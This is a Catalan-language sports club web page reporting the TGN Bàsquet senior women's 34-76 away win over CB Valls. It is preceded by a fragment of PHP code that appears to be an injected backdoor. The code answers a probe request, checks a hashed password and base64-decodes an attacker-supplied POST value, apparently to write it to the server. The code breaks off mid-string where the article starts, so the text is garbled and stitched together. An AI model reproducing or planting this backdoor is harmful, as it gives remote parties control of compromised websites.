function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet guanya còmodament el derbi contra el CB Valls (34-76) - Tgn Bàsquet Club -

El TGN Bàsquet guanya còmodament el derbi contra el CB Valls (34-76)

By
Updated: abril 14, 2022

El Sènior del TGN Bàsquet va aconseguir una àmplia victòria a domicili contra el CB Valls. Les liles van tenir una molt bona sortida, amb un parcial de 8-25, que va deixar una bretxa de punts important entre els dos equips i que va marcar la tendència de quasi tots els quarts. El CB Valls arrossegava baixes que van condicionar el seu joc, cosa que no les va permetre aturar les ofensives de les visitants. Només al tercer quart les vallenques van ser capaces d’endur-se el parcial (14-7), després d’apujar la intensitat defensiva. Però el matx ja estava sentenciat i a l’últim període les tarragonines tornaven a dominar clarament arribant als 42 punts de diferència.

Carla Polo va jugar el seu primer partit després d’estar més de dos mesos aturada per culpa d’un edema ossi al genoll.

Aquesta victòria col·loca les jugadores d’en Neila en una molt bona posició. El CB Balaguer va perdre contra el Safa Claror, és per això que caldrà certificar la permanència la propera jornada a casa contra el CB Balaguer.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *